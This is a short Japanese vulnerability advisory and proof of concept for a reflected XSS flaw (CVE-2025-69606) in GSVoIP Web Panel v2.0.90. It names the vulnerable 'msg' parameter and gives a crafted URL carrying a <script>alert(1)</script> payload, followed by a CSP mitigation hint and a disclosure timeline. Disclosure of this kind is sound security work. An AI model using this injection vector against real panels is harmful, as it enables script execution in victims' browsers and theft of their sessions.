
GSVoIP Web Panel v2.0.90の反射型XSS脆弱性(CVE-2025-69606)の概念実証。msgパラメータを介した認証不要の任意のJavaScript実行を実証します。
| フィールド | 詳細 |
|---|
| 製品 | GSVoIP Web Panel |
| バージョン | 2.0.90 (以前のバージョンも含む) |
| ベンダー | Solutions VoIP (GS Solutions) |
| CWE | CWE-79 — クロスサイトスクリプティング |
| 攻撃ベクトル | リモート / ネットワーク |
| 認証 | 不要 |
GET /painel/gateways.php/error?msg=<ペイロード>
msg パラメータは、サニタイズや出力エンコーディングなしで HTML 応答に直接反映されます。
https://{TARGET}/painel/gateways.php/error?msg=%3Cscript%3Ealert(1)%3C%2Fscript%3E
デコード:
<script>alert(1)</script>
細工された URL にアクセスすると、注入されたペイロードが被害者のブラウザで実行されます:
alert(1)
msg パラメータに XSS ペイロードを含む悪意のある URL を作成します。script-src ディレクティブを含む厳格な CSP を実装します。| ステップ | イベント |
|---|---|
| 1 | 脆弱性を発見し報告した Luiz Eduardo |
| 2 | CVE 割り当て: CVE-2025-69606 |
| 3 | 公開開示 |
発見・報告者: Luiz Eduardo
CVE-2025-69606 · CWE-79 · GSVoIP Web Panel v2.0.90